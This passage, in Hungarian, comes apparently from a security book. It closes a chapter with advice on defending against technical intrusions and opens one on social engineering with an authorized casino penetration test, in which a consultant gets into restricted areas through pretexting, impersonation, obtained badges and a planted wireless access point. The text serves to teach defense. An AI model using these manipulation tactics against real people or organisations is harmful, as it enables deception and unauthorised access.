Valamikor a múltban a 3COM eszközt közvetlen a Cisco router soros


portjába dugták. Míg az azonnali igények kielégítésének nyomása
igazolhatja az ideiglenes technológiai kerülőutakat, egyetlen cég sem
engedheti meg, hogy az „ideiglenes” megoldás „állandóvá” váljon.
Ütemtervet kell felállítani az átjáró berendezések beállításainak fizikai
és logikai vizsgálattal történő ellenőrzésére, illetve a megfelelő
biztonsági eszközzel folyamatosan figyelni kell, hogy vannak-e egy
hoston vagy eszközön a cég biztonsági politikájával összhangban nem
lévő nyitott portok.

Magas számú portok használata

A biztonsági cég úgy konfigurált egy Cisco routert, hogy az egy


magas számú porton keresztül engedje meg a távoli csatlakozást. Tették
ezt feltehetően abban a hitben, hogy a magas számú port elég rejtett
ahhoz, hogy egyetlen támadó se találja meg – újabb példa a
„titkolózáson alapuló biztonság” megközelítésre.
Már többször is beszéltünk a könyv oldalain az ezen a hozzáálláson
alapuló minden biztonsági döntés butaságáról. A könyv történetei újra
meg újra bizonyítják, hogy ha akár csak egyetlen rést is meghagyunk,
azt valamelyik támadó előbb vagy utóbb úgyis megtalálja. A legjobb
biztonsági gyakorlat az, ha biztosítjuk, hogy minden rendszer és eszköz
hozzáférési pontjai, akár rejtettek, akár nem, szűnne legyenek a nem
megbízható hálózatoktól.

Jelszavak
Ismét elmondjuk, hogy minden eszköz alapértelmezett jelszavát meg
kell változtatni a rendszer vagy az eszköz üzembe helyezése előtt. Még
a „fehér-öves” hackerek is tudnak erről a gyakori figyelmetlenségről,
és tisztában vannak azzal, hogyan aknázzák ki. (Az Internet több
weboldalán. így például a www.phenoelit.de/dpl/dpl.html oldalon is
megtaláljuk az alapértelmezett felhasználói nevek és jelszavak listáját.)
A laptopok biztonságossá tétele
A cég távoli alkalmazottjai által használt rendszerek biztonság nélkül
vagy alacsony biztonsági szint mellett csatlakoztak a céges hálózathoz;
sajnos túl gyakran fordul elő ez a helyzet. Az egyik kliensen még PC
Anywhere is volt, és úgy volt beállítva, hogy jelszó nélkül
engedélyezte a távoli csatlakozást. Noha a számítógép betárcsázáson
keresztül csatlakozott az Internethez, és minden egyes esetben csak
nagyon korlátozott ideig tette ezt, minden egyes csatlakozás alkalmat
teremtett a feltörésre. A PC Anywhere futtató laptophoz való
csatlakozással a támadók távoli irányítást szereztek a gép felett. És
mivel úgy volt beállítva, hogy nem kért jelszót, a támadók pusztán az
IP-cím ismeretében képesek voltak eltéríteni a felhasználó asztalát.
Az informatikai biztonsági szabályzat megalkotóinak mérlegelniük
kellene egy olyan követelményt, hogy a kliensrendszerek bizonyos
szintű biztonságot tartsanak fenn ahhoz, hogy csatlakozhassanak a
céges hálózathoz. Léteznek termékek, amelyek annak érdekében, hogy
a biztonsági vezérlők összhangban legyenek a céges elvárásokkal,
ágenseket telepítenek a kliensrendszerekre; máskülönben a
kliensrendszer nem kap hozzáférést a céges számítógépes
erőforrásokhoz. A rossz fiúk a teljes kép megvizsgálásával elemzik
célpontjaikat. Ez azt jelenti, hogy megpróbálják azonosítani, vannak-e
távolról csatlakozó felhasználók, és ha igen, honnan csatlakoznak. A
támadó tudja, hogy ha fel tud törni egy a céges hálózathoz való
csatlakozásra használt megbízható számítógépet, akkor ez a
megbízható kapcsolat nagy valószínűséggel felhasználható a vállalati
információforrásokhoz való hozzáférés megszerzésére.
Még a biztonságot megfelelően kezelő cégeknél is túlságosan
gyakori az a jelenség, hogy az alkalmazottak által a céges hálózat
elérésére használt laptopokat és otthoni számítógépeket figyelmen
kívül hagyják, meghagyva a támadónak a lehetőséget ennek
kiaknázására, ahogy az ebben a sztoriban történt. A belső hálózathoz
csatlakozó laptopoknak és otthoni számítógépeknek biztonságosaknak
kell lenniük, máskülönben az alkalmazott számítógépes rendszere lesz
a gyenge láncszem, amivel visszaélnek.

Hitelesítés

Az ebben a történetben szereplő támadók észrevétlenül tudták


kinyerni a kliens rendszeréből a hitelesítési információkat. Miként a
korábbi fejezetekben ismétlődően rámutattunk, az ellenőrzés erősebb
formája poraiban zúzza szét a legtöbb támadó próbálkozásait, és a
cégeknek a VPN-ekhez vagy egyéb titkos rendszerekhez való távoli
hozzáférés esetén mérlegelniük kellene a dinamikus jelszavak,
smartkártyák, tokenek vagy digitális tanúsítványok hitelesítési
eszközként való használatát.

Felesleges szolgáltatások szűrése

Az informatikai szakembereknek mérlegelniük kellene olyan


szűrőszabályok létrehozását, amelyek az adott hostokhoz és
szolgáltatásokhoz megbízhatatlan hálózatokból (pl. Internet), illetve a
cégen belüli félig megbízható (DMZ) hálózatokból érkező bemenő és
kimenő kapcsolatokat ellenőrzik.

Megerősítés

A történet olyan informatikai személyzetet mutatott be, amelynek


tagjai nem bajlódtak azzal, hogy megerősítsék a belső hálózathoz
kapcsolódó számítógépes rendszereket vagy naprakészen tartsák a
biztonsági javításokat, feltételezhetően részben amiatt, hogy túlságosan
alacsonynak érzékelték a feltörés veszélyét. Ez az elterjedt gyakorlat
előnyt ad a rossz fiúknak. Ha egy támadó megtalálja a módját annak,
hogy hozzáférést szerezzen akár egyetlen nem biztosított belső
rendszerhez, és képes is feltörni azt, akkor feltárul a feltört számítógép
által megbízhatónak tekintett többi rendszerhez való hozzáférés ajtaja.
Ha egyszerűen csak a tűzfalra számítunk a hackerek kapun kívül
tartásában, és nem foglalkozunk azzal, hogy megerősítsük a céges
hálózathoz csatlakozó rendszereket, az kicsit olyan, mintha minden
vagyonukat az étkezőasztalra pakolnánk százdolláros kötegekben, és
azt gondolnánk, hogy biztonságban vagyunk, mivel zárva tartjuk a
bejárati ajtót.
ZÁRÓJELBEN

Mivel ez az utolsó technikai alapú támadásokat szemléltető fejezet,


célszerűnek tűnik egy kis összefoglalással zárni.
Ön vajon miket említene, ha arra kérnénk, hogy a könyv történetei
alapján nevezze meg a támadók által a bejutáshoz használt
leggyakoribb sebezhetőségek elleni védekezés fontos lépéseit?
Kérjük, mielőtt tovább olvasna, röviden gondolja át a választ; csak
ezt követően lapozzon a következő oldalra.
Akármi is jut a kedves olvasó eszébe a könyvben bemutatott
leggyakoribb sebezhetőségekkel kapcsolatban, nagyon remélem, hogy
legalább a következők némelyike közöttük volt:
Javításkezelő folyamat kidolgozása, amely biztosítja, hogy a
szükséges biztonsági javítások kellő időben telepítve lesznek.
A bizalmas információhoz vagy számítógépes forrásokhoz való
távoli hozzáférés esetén a statikus jelszavaknál erősebb hitelesítési
módszerek használata.
Az összes alapértelmezett jelszó meg változtatása.
A mélységi védelem modelljének használata, amely biztosítja, hogy
egyetlen hibás pont nem ássa alá a biztonságot; a modell rendszeres
időközönként történő rutinellenőrzése.
A bejövő és kimenő forgalom szűrésére vonatkozó céges biztonsági
szabályzat kidolgozása.
A bizalmas információhoz vagy számítógépes erőforrásokhoz
hozzáférő kliens alapú rendszerek megerősítése. Ne feledjük, hogy a
kitartó támadó a kliensrendszereket is célba veszi jogosult kapcsolat
eltérítése vagy a kliensrendszer és a céges hálózat közötti megbízható
kapcsolat kihasználása céljából.
Behatolásérzékelő készülékek használata a gyanús forgalom vagy az
ismert sebezhetőségek kiaknázására irányuló kísérletek azonosítására.
Az ilyen rendszerek a rosszindulatú belsősöket, illetve a kerületi
védelmet már feltörő támadót is képesek kiszűrni.
Az operációs rendszer és a kritikus alkalmazások auditálási
funkciójának bekapcsolása. Gondoskodjunk arról is, hogy a naplók
olyan biztonságos hoston legyenek tárolva, ahol nincsenek más
szolgáltatások, és a lehető legkevesebb felhasználói fiók van.
10. fejezet

Social engineerek – Hogyan működnek és hogyan


akadályozzuk meg őket?
A social engineer ugyanazokat a meggyőzőtechnikákat alkalmazza,
amiket mindannyian használunk a mindennapok során. Szerepeket
veszünk fel. Hitelességet próbálunk megteremteni. Viszonzandó
szívességeket teszünk A social engineer azonban manipuláló és
megtévesztő, nagyon etikátlan módon alkalmazza e technikákat – és
gyakran elsöprősikert ér el velük.
Dr. Brad Sagarin társadalompszichológus
Ez a fejezet kissé eltér a korábbiaktól. Azt a támadástípust tekintjük
át, amelyiket a legnehezebb észlelni, és amely ellen a legnehezebb
védekezni. A megtévesztés művészetében jártas social engineer vagy
támadó az emberi természet legnemesebb tulajdonságait használja ki:
azt a természetes törekvésünket, hogy segítőkészek, udvariasak,
pozitívak legyünk, csapatjátékosként viselkedjünk, illetve azt a
vágyunkat, hogy elvégezzük a munkánkat.
Akárcsak az élet bármely területén bennünket fenyegető dolgok
esetén, a megfelelő védelem irányába tett első lépés itt is a
kiberkalandorok által használt módszerek megértése. Ennek érdekében
pszichológiai jellegű kis elemzéseket mutatunk most be azokról az
emberi tulajdonságokról, amelyeket tudatosan kihasználva oly
meggyőzővé válik a social engineer.
Az első, igen tanulságos történet munka közben mutat be egy social
engineert. Az alábbiak egy írásban kapott történeten alapulnak, amely
nagyon szórakoztató, de egyben a social engineering tankönyvekben
szereplő eset-tanulmány is lehetne. Annyira jónak találtuk, hogy
néhány fenntartásunk ellenére közöljük; a férfi vagy véletlenül
kihagyott néhány részletet a történetből, mert figyelmét más kötötte le,
vagy a történet egy részét esetleg ő találta ki. Ám még ha részben
fikcióról van is szó, az eset nagyon meggyőzően hívja fel a figyelmet a
social engineering támadásokkal szembeni jobb védelem
szükségességére.
Akárcsak a könyv többi részében, a támadó és az érintett vállalat
érdekében bizonyos részleteket most is megváltoztattunk.
MUNKÁBAN A SOCIAL ENGINEER

2002 nyarán egy Las Vegas-i szállodacsoport különböző biztonsági


ellenőrzések végrehajtásával bízott meg egy „Whurley” becenevű
biztonsági tanácsadót. A cégnél éppen a biztonsághoz való viszony
felülvizsgálatán dolgoztak, és azért bérelték fel a tanácsadót, hogy a
jobb biztonsági infrastruktúra kialakítása érdekében „próbálja meg
megkerülni az összes biztonsági intézkedésünket”. Whurley széles körű
műszaki tapasztalatokkal rendelkezett, azonban a kaszinó teljesen új
terület volt számára.
Körülbelül egyhetes, a kaszinók kultúrájában végzett kutatómunka
után eljött az idő, hogy az igazi Las Vegas felé vegye az irányt. Bevett
gyakorlata volt, hogy a munkát ilyen korán elkezdi, és még a hivatalos
kezdési időpont előtt befejezi, mert az évek során azt tapasztalta, hogy
a menedzserek csak akkor szólnak alkalmazottaiknak a potenciális
ellenőrzésről, amikor azt ténylegesen várják. – Noha senkit nem lenne
szabad figyelmeztetni, ők általában megteszik. – Whurley azonban
egyszerűen elkerüli ezt azzal, hogy az ellenőrzést a tervezett időpont
előtti két hétben hajtja végre.
Annak ellenére, hogy este kilenc fele járt már az idő, amikor
megérkezett és elfoglalta a szobáját. Whurley egyenesen a listáján levő
első kaszinóba ment, hogy megkezdje a helyszíni kutatómunkát. Mivel
korábban alig járt kaszinóban, nyitott szemmel figyelt mindent. Az első
dolog, amit észrevett, az teljes mértékben eltért a Travel Channelen
látottaktól, ahol minden meginterjúvolt vagy egyszerűen csak
lefilmezett kaszinóalkalmazott elit biztonsági szakértőnek tűnt. A
helyszínen látott alkalmazottak többsége látszólag „vagy álló
helyzetben aludt, vagy teljesen önelégülten végezte munkáját”.
Mindkét esetben könnyű célpontjai lennének a legegyszerűbb
átverésnek is – amelyek ráadásul közelébe sem érnek annak, amit ő
tervezett.
Odalépett egy igen „ellazult” alkalmazotthoz, aki kis biztatás után
hajlandó volt a munkája részleteiről beszélni. Vicces, de korábban
éppen Whurley ügyfelének a kaszinójában dolgozott. – Fogadom, hogy
ott sokkal jobb volt, nem? – kérdezte Whurley
Az alkalmazott ezt válaszolta; – Nem igazán. Itt mindig ellenőrzik a
termet. Ott azt sem vették észre, ha kicsit hátramentem, mindent ilyen
lazán kezeltek... blokkoló órák, belépőkártyák, időbeosztás, miegymás.
A jobb kezük nem tudja, hogy mit csinál a bal.
A férfi azt is elmesélte, hogy állandóan elveszítette a
belépőkártyáját, és előfordult, hogy egy másik alkalmazottét használta,
hogy hozzájusson a kaszinó alkalmazottainak fenntartott étkezdében az
ingyenes étkezéshez.
Következő reggel Whurley megfogalmazta célját, ami nagyon is
kézenfekvő volt – lehetőség szerint a kaszinó összes védett területére
bejut, dokumentálja jelenlétét, majd megpróbál minél több biztonsági
rendszerbe bejutni. Ezen túlmenően ki akarta deríteni, hogy hozzáférést
tud-e szerezni a pénzügyi vagy más bizalmas információt, például a
látogatók adatait tartalmazó rendszerek valamelyikéhez.
Aznap éjjel, a célba vett kaszinó felkeresése után, úton hazafelé egy
fitness-terem hirdetésére figyelt fel, amely különleges ajánlattal várta a
szolgáltatási iparágban dolgozó alkalmazottakat. Aludt egy keveset,
majd következő reggel a fitness-terem felé vette az irányt.
Amikor odaért, egy Lenore nevű hölgyet vett célba. – Tizenöt perc
alatt „lelki kapcsolat” alakult ki közöttünk. – Ez azén bizonyult
nagyszerűnek, mert Lenore pénzügyi ellenőr volt, a férfi pedig mindent
tudni akart arról, amit a „pénzügyi” és az „ellenőrzés” szavak a
kiszemelt kaszinó esetében jelenthettek. Amennyiben ellenőrzése során
be tudna hatolni pénzügyi rendszereikbe, azt minden bizonnyal nagy
biztonsági hibaként értékelné az ügyfele.
Social engineering tevékenységei során Whurley egyik kedvenc
trükkje az úgynevezett „cold reading” (csoportos megerősítés)
művészete. Beszélgetés közben figyeli a másik nem verbális
kommunikációját, majd mond valamit, amire a beszélgető partner
ösztönösen azt mondja: – Ó, dehogynem – én is. – Ezt most is elsütötte,
majd elhívta ebédelni a nőt.
Az ebéd során Whurley elmondta, hogy nemrégiben jött Vegasba, és
éppen állást keres, hogy egyetemre járt és pénzügyi diplomája van, és a
barátnőjével való szakítás után költözött ide. A ritmusváltozás segített
neki átvészelni a szakítást. Majd bevallotta, hogy kicsit fél attól, hogy
Vegasban keressen magának pénzügyi ellenőri állást, mert nem akarja
„a cápák között végezni”. A következő néhány órában a nő biztosította
arról, hogy nem lesz olyan nehéz pénzügyes állást találnia. Hogy
segítsen neki, Lenore részleteket is elmondott neki a munkájáról és
munkaadójáról, többet is, mint amennyire szükség volt. – Ő volt a
legjobb, ami e feladat során ez idáig történt velem, így boldogan
fizettem ki az ebédet – amit amúgy is elszámolhattam.
Visszatekintve azt mondta, hogy ennél a pontnál túlzott
önbizalommal tekintett saját képességeire, „ami később még sokba
került”. Ideje volt nekilátni a munkának. Volt egy táskája, tele „hasznos
cuccokkal, többek között a laptopom, egy Orinoco szélessávú, vezeték
nélküli átjáró (gateway), egy antenna és néhány más kiegészítő”. A cél
egyszerű volt. Megpróbálni bejutni a kaszinó irodaterületére,
(időbélyeggel ellátott) digitális fényképeket készíteni saját magáról
olyan helyeken, ahol nem kellene lennie, majd a hálózatra vezeték
nélküli hozzáférési pontot telepítve megpróbálni távolról meghackelni
a rendszert, és bizalmas információk után kutatni. A munka
befejezéséhez másnap vissza kell mennie a vezeték nélküli hozzáférési
pontért.
– Úgy éreztem magam, mint James Bond. – Whurley a személyzeti
bejáratnál érkezett a kaszinóhoz, pont műszakváltás idején. Úgy
helyezkedett el, hogy jól megfigyelhesse a bejáratot. Azt gondolta,
idejében jött ahhoz, hogy legyen néhány perce a dolgok kifigyelésére,
de úgy tűnt, hogy az emberek nagy része már megérkezett, és
kénytelen volt egyedül megpróbálni a bejutást.
Néhány perc várakozás után a bejárat teljesen üres volt... nem igazán
erre vágyott. Whurley azonban észrevett egy őrt, akiről úgy tűnt,
mintha éppen távozni készülne, de egy másik őr megállította, és együtt
cigarettáztak az ajtón kívül. Amikor elszívták a cigarettájukat, elváltak,
és két különböző irányban indultak el.
Keresztülvágtam az utcán az épületet elhagyó őr irányában, és
felkészültem, hogy feltegyem a kedvenc lefegyverezőkérdésemet.
Ahogy közeledett felém az utcán átvágva, hagytam, hogy éppen
elmenjem mellettem.
Ekkor azt mondta neki; – Bocsánat, elnézést, meg tudja mondani,
mennyi az idő?
Mindez a terv szerint történt. – Már korábban észrevettem, hogy ha
szemből közelítünk valakihez, akkor az majdnem mindig sokkal
védekezőbb magatartást mutat, mintha a megszólítás előtt hagyjuk
kicsit elmenni magunk mellett. Amíg az őr megmondta Whurleynek a
pontos időt, a férfi alaposan megnézte őt. A belépőkártyáján levő név
elárulta, hogy Charlie-nak hívják. – Ahogy ott álltunk, váratlan
szerencse ért. Egy másik alkalmazott jött ki az ajtón, és becenéven,
Cheesynek szólította Charlie-t. Megkérdeztem Charlie-t, hogy szereti-e
a becenevét, mire ő elmondta, hogyan szerezte azt.
Whurley ezt követően határozott léptekkel közeledett a személyzeti
bejárathoz. Gyakran mondják, hogy a legjobb védekezés a támadás, és
pontosan ez volt az ő terve is. Amikor odaért a bejárathoz, ahol –
korábban megfigyelte – az alkalmazottak felmutatják a
belépőkártyájukat, egyenesen odalépett az őr asztalához, és azt mondta
neki: – Helló, nem láttad Cheesyt? Jön nekem 20 dolcsival, és kéne a
pénz, hogy egyek valamit, amikor szünetem lesz.
Visszaemlékezvén erre a pillanatra, azt mondja: – A fenébe! Itt
mindjárt elkövettem az első hibát. – Elfelejtette, hogy az alkalmazottak
ingyen étkezést kapnak. Azonban nem bukott le emiatt; míg a
figyelemhiányos-hiperaktív betegségben (ADHD) szenvedők
problémaként élik meg a betegségüket, Whurley azt mondja magáról,
hogy ő „nagyon ADHD-s”, és hozzáteszi, hogy ennek
eredményeképpen „sokkal gyorsabban gondolkodom, mint az emberek
90 százaléka, akikbe belefutok”. Ez a képesség most is nagyon jól jött.
Szóval az őr erre azt mondja: – Mi a fenének kell egyáltalán ebédet
venned? – és kuncogott egyet, de elkezdett gyanakodva nézni rám.
Gyorsan kiböktem: – Egy cicával ebédelek ma. Haver, nagyon dögös.
(Ez mindig eltereli az idősebb, a nőkkel hadilábon álló és az anyámmal
lakom típusú fickók figyelmét). Most mit fogok csinálni?
Az őr azt válaszolja: – Hát ezt jól elszúrtad, mert Cheesy már nem
lesz a héten.
– A szemét – mondom én.
Az őr ezt követően azzal szórakoztatta Whurleyt, hogy váratlanul
megkérdezte tőle, szerelmes-e (Whurley nem merte mutatni a
meglepetését).
Csak elkezdtem vele beszélgetni. Aztán jött életem meglepetése. Soha
előtte nem tapasztaltam ilyesmit. Tulajdoníthatnám az ügyességemnek,
azonban inkább a vakszerencsének köszönhetem: a fickó adott nekem
40 dollárt. Azt mondja, hogy 20 dollárért szart se kapok, és nyilván
nekem kell fizetnem az ebédet. Ezt követően ötpercnyi atyai jó
tanáccsal lát el, meg mindenfélét mond arról, hogy bárcsak az én
koromban tudta volna azt, amit most tud.
Whurleyt lenyűgözte, hogy ez a fickó bevette ezt az átverést, és
fizetett neki a kitalált randira.
A dolgok azonban mégsem mentek olyan simán, ahogy azt Whurley
gondolta, mert miközben elindult befele, az őr rájött, hogy nem mutatta
fel a belépőkártyáját, és rászólt. – Így azt mondtam neki: „A táskában
van, sajnálom”, és elkezdtem turkálni a táskában, miközben folytattam
az utam. Meleg helyzet volt, mert ha ragaszkodott volna ahhoz, hogy
mutassam a kártyát, elszúrhattam volna az egészet.
Whurley immár a személyzeti bejáraton belül volt, azonban ötlete
sem volt arra vonatkozóan, hogy merre menjen. Senki nem volt, akit
követhetett volna, így magabiztosságot mutatva sétált, és elkezdte
figyelni a környezetét. Csak egy kicsit tartott attól, hogy valaki
rákérdez, mit csinál itt. – Furcsa – mondja –, hogy milyen jól jöhet a
színek pszichológiája. Kék ruhát viseltem, az igazság színét, és úgy
voltam öltözve, mint egy fiatal menedzser. Az emberek többsége
személyzeti ruhát viselt, így elég valószínűtlen volt, hogy valaki
kérdőre
Ahogy sétált a folyosókon, észrevett egy olyan kameraszobát, amely
pontosan úgy nézett ki, mint amilyet a Travel Chanelen látott – egy
„mindenlátó” szoba, csak éppen itt nem fej felett voltak a monitorok. A
külső szobában „annyi videomagnó volt, amennyit még sose láttam
egyszerre – nagyon kemény volt”! Átsétált a belső szobába, majd
valami igazán merészet tett. – Egyszerűen besétáltam, megköszörültem
a torkomat, és mielőtt bármit kérdezhettek volna, azt mondtam:
„Nézzétek a lányt a 23-ason.”
Az összes monitor be volt számozva, és persze majdnem
mindegyiken volt egy lány. A férfiak a 23-as monitor köré gyűltek, és
arról kezdtek beszélni, hogy mire készülhet a lány. Whurley azt
gondolta, hogy jó adag paranoiát sikerült elültetnie bennük. Ez ment
úgy 15 percig, a képernyőkön látható embereket figyelték, miközben
Whurley megállapíthatta, hogy ez a tökéletes csel azokkal szemben,
akikben van némi hajlam a kukkolás iránt.
Amikor készen állt a távozásra, így szólt: – Ó, úgy elterelte a
figyelmemet az a lány, hogy elfelejtettem bemutatkozni. Walter vagyok
a belső ellenőrzéstől. Most vettek fel Dan Moore csapatába – mondta, a
belső ellenőrzés vezetőjének a nevét említve, amiről a szobában levő
alkalmazottak beszélgetéseiből hallott. – Soha nem voltam még ebben
a létesítményben, és egy kicsit eltévedtem. Meg tudná mutatni nekem
valaki a vezetői irodákhoz az utat?
A fickók nagyon megörültek, hogy megszabadulhatnak a közéjük
tolakodó vezetőtől, és lelkesen segítettek „Walter”-nek, hogy
megtalálja a keresett irodákat. Whurley az általuk mutatott irányban
indult. Mivel senki nem volt a látóhatáron, úgy döntött, hogy kicsit
körbenéz, és talált egy kis pihenőszobát, ahol egy fiatal nő újságot
olvasott. – Megan volt, egy igazán csinos lány így Megan és én
beszélgettünk néhány percig. Majd az mondta: „Ó, ha a belső
ellenőrzésen vagy, van itt néhány cucc, amit vissza kellene juttatnom
oda”. – Mint kiderült, volt Megannél jó pár belépőkártya, néhány belső
feljegyzés, és egy papírokat tartalmazó doboz – ezeket a belső
ellenőrzési csoport központjába kellett visszavinni. Whurley azt
gondolta: – Ejha, most már belépőkártyám is van!
Nem mintha az őrök különösebben figyelmesen néznék meg a
belépőkártyákon levő fényképeket, azonban elővigyázatosságból
megfordította, hogy a hátoldala legyen látható.
Ahogy sétálok kifele, egy nyitott, üres irodát látok. Van benne két
hálózati port, de ránézésből nem lehet megállapítani, hogy aktívak-e,
ezért visszamegyek oda, ahol Megan ül, és azt mondom neki, hogy
elfelejtettem, hogy meg kell néznem az ő rendszerét és a „főnök
irodájában” levőt. Jóindulatúan beleegyezik, és hagyja, hogy odaüljek
az asztalához.
Amikor kérem, megadja a jelszavát, majd ki kell mennie a mosdóba.
Azt mondom neki, hogy egy „hálózati biztonsági ellenőrzőprogramot”
telepítek, és megmutatom neki a vezeték nélküli hozzáférési pontot. Azt
válaszolja: – Csinálj nyugodtam bármit, én nem nagykőn értek ezekhez
a számítógépes dolgokhoz.
Amíg a nő kint volt, Whurley telepített egy vezeték nélküli
hozzáférési pontot, majd újraindította Megan gépét. Ezt követően
rájött, hogy egy 256 MB-os USB flash drive van a kulcscsomóján,
illetve teljes hozzáférése van a nő számítógépéhez. – Elkezdtem a
merevlemezén böngészni, és mindenféle jó anyagot találtam ott. –
Kiderült, hogy ő volt a felsővezetők adminisztratív asszisztense, és a
fájljaikat „szépen” név szerint rendezte. Átmásolt mindent, amit csak
tudott, majd a digitális kamerájának időzítő funkciójával készített
magáról egy fényképet, ahogy az ügyvezető irodájában ül. Amikor
néhány perccel később Megan visszatért, megkérdezte tőle, hogyan
talál el a Hálózatüzemeltetési Központba (HŰK).
Itt azonban „komoly problémával” szembesült. A következőt
mesélte: – Először is a hálózati szoba ki volt táblázva..., ami szuper.
Azonban az ajtaja zárva volt. – Mivel nem volt olyan belépőkártyája,
amely kinyitotta volna az ajtót, megpróbált kopogni.
Egy úriember nyitott ajtót, és elmondtam neki is a korábban használt
sztorit: – Hello, Walter vagyok a belsőellenőrzéstől, és bla-bla-bla. –
Csak azt nem tudtam, hogy ennek a fickónak a főnöke – az informatikai
vezető– az irodában ül. Szóval az ajtónál levőfickó azt mondja: –
Nézze, le kell ellenőriznem Richardnál Várjon itt egy másodpercig.
Megfordul, és azt mondja a másik fickónak, hogy hívja Richardot, és
tudassa vele, hogy van valaki itt, aki azt „állítja”, hogy a
belsőellenőrzéstől jött. Néhány pillanattal később lebuktam. Richard
megkérdezi, hogy kivel vagyok, hol van a belépőkártyám, és gyors
egymásutánban még vagy fél tucat kérdést szegez nekem. Majd azt
mondja nekem: – Miért nem jön be az irodámba? Közben én felhívom a
belsőellenőrzést és tisztázzuk az egészet.
Whurley először azt gondolta: – Ez a fickó teljesen lebuktatott. –
Majd ezt követően: – Gyorsan gondolkodok egy kicsit, majd azt
mondom neki, hogy „Elkapott!”, és megrázom a kezét. Aztán így
szóltam: „A nevem Whurley”. És benyúlok a táskámba, hogy
elővegyem a névjegykártyámat. Majd elmondom neki, hogy már
néhány órája a kaszinó személyzete részére fenntartott őrzött területen
bolyongok, idáig egyetlen ember sem vont kérdőre, ő volt az első, és ez
minden bizonnyal nagyon jól fog kinézni a jelentésemben. Majd azt
mondom neki: „Üljünk be az irodájába, közben áttelefonálhat, és
ellenőrizheti, hogy minden rendben van. Ráadásul folytatnom kell a
munkámat, és tájékoztatnom kell Marthát, aki ezért az akcióért felelős,
az itt látott dolgokról.”
Ahhoz képest, hogy egy meleg helyzetben meghozott
gyalogáldozatról volt szó, kiválóan működött. Csodálatos átváltozás
történt. Richard arról kezdte Whurleyt kérdezgetni, hogy mit látott,
kiket ismert meg, és így tovább, majd elmesélte, hogy saját maga is
végzett ellenőrzést annak érdekében, hogy a biztonsági költségvetés
növelésével biztonságosabbá lehessen tenni a HÜK-ot. Egy kis
biometrika meg minden ilyesmi. És azt mondta, hogy talán fel tudná
használni Whurley tapasztalatait, azok segíthetnék a célja elérésében.
Ekkorra már ebédidő volt. Whurley – kihasználva a partnere nyitását
– azt javasolta, hogy esetleg ebéd közben beszélhetnének a dologról,
amit Richard is jó ötletnek tartott, és együtt indultak a személyzeti
étkezőbe. – Figyelték ugye, hogy eddig a pontig még senkinek nem
telefonáltunk. Ezért azt javasoltam, hogy telefonáljunk, mire azt
mondja: „Van névjegykártyája, és tudom, hogy kicsoda ön.” – Így
együtt ebédeltek az étkezőben, ahol Whurley ingyen evett, és egy új
„barátot” szerzett.
– A hálózati ismereteimről kérdezett, majd az AS400-asokról
kezdtünk beszélni; mindent ezeken futtatott a kaszinó. Az a tény hogy a
dolgok ilyen irányban mentek, két szóval írható le a legjobban: igazán
rettenetes. – Rettenetes, mert a férfi, aki az informatikai vezető volt és
a számítógépes biztonságért felelt, mindenféle titkos és bennfentes
információt osztott meg Whurley-vel, és még azt az egyszerű lépést
sem tette meg, hogy személyazonosságát ellenőrizze.
Ezzel kapcsolatban Whurley azt figyelte meg, hogy „a középszintű
menedzserek soha nem akarnak nyomás alá kerülni. Mint a legtöbb
ember, nem akarnak tévedni, el akarják kerülni, hogy nyilvánvaló hiba
elkövetésén kapják őket. Óriási előnyt jelent, ha megértjük a
gondolatmenetüket.” Ebéd után Richard visszavitte Whurleyt a HÜK-
ba.
– Amikor belépünk, bemutat Larrynek, aki az AS400-asok fő
rendszergazdája. Elmagyarázza Larrynek, hogy egy ellenőrzés miatt
néhány napig „a nyakukra fogok járni”, és hogy velem ebédelt, s
közben rábeszélt, hogy készítsek egy előzetes ellenőrzést, amivel
megmenthetem őket a majdani nagyobb kellemetlenségektől, amikor a
tényleges ellenőrzésre kerül sor. – Ezt követően Wurley néhány percig
Larryvel beszélt, aki áttekintést adott neki a rendszerekről, így sikerült
több hasznos információt gyűjtenie a jelentéséhez; megtudta például
azt, hogy a HŰK tárolta és dolgozta fel az egész szállodacsoport
összesített adatait.
Azt mondtam neki, hogy gyorsabban jutnánk a dolog végére, ha
kapnék egy diagramot a hálózat felépítéséről, megkapnám a tűzfal
ACL-eket (Access Control Lists – hozzáférés-szabályzó listák), és így
tovább. Csak az után adta át nekem ezeket, hogy felhívta Richardot, és
a jóváhagyását kérte. Azt gondoltam: – Jó neki.
Whurley hirtelen rájött, hogy a vezeték nélküli hozzáférési pontot a
vezetői irodákban hagyta. Noha a Richarddal kialakított kapcsolata
jelentősen csökkentette a lebukás veszélyét, elmagyarázta Larrynek,
hogy vissza kell mennie, hogy felvegye az ott felejtett hozzáférési
pontot. – Ehhez szükségem lenne egy belépőkártyára, hogy vissza
tudjam engedni magam a HÜK-be, és szabadon járkálhassak. – Larry
vonakodott segíteni, így Whurley azt javasolta, hogy ismét hívja fel
Richardot. így is tett, és azt mondta neki, hogy a látogató egy
belépőkártyát szeretne kapni; Richardnak egy még jobb ötlete támadt: a
kaszinó nemrégiben több alkalmazottnak is felmondott, akiknek a
belépőkártyái még mindig a HÜK-ben voltak, és idáig senki nem vette
a fáradságot, hogy deaktiválja őket, „így tökéletesen megfelel neki, ha
az egyik ilyet fogja használni”.
Whurley visszament, hogy Larry elmagyarázza neki a rendszereket,
és bemutassa neki a mostanában végrehajtott biztonsági intézkedéseket.
Egy telefonhívás jött; Larry felesége volt az, hallhatóan mérges és
izgatott volt valamilyen folyamatban levő ügy miatt. Whurley rácsapott
az adandó alkalomra, felismervén, hogy jól jöhet ki belőle. Larry azt
mondta a feleségének: – Figyelj, most nem tudok beszélni. Van valaki
itt az irodában. – Whurley elmutogatta Larrynek, hogy egy pillanatra
tegye le a telefont, majd azt tanácsolta neki, hogy jobb, ha ezt a
problémát most átbeszéli a feleségével. Felajánlotta, hogy megkeresi az
egyik belépőkártyát, ha Larry megmutatja, hogy hol vannak.
– Így Larry odasétált velem az irattartószekrényhez, kinyitotta az
egyik fiókot, és annyit mondott: „Vegye el az egyiket”. Majd
visszament az íróasztalához, és felvette a telefont. Észrevettem, hogy a
belépőkártyákhoz nincsen nyilvántartó lap vagy napló, így kettőt
vettem ki a számtalan ott heverő kártya közül. – Ezzel Wherley
nemcsak egy egyszerű belépőkártyához jutott, hanem egy olyanhoz,
amellyel bármikor bejut a HÜK-be.
Ezt követően Whurley visszatért, hogy meglátogassa új barátját,
Megant, visszaszerezze a vezeték nélküli hozzáférési pontját, és lássa,
mi egyebet tud még kideríteni. Ráadásul elég sok ideje volt mindehhez.
Úgy éreztem, hogy az idővel nem lesz baj, mert a feleségével fog a
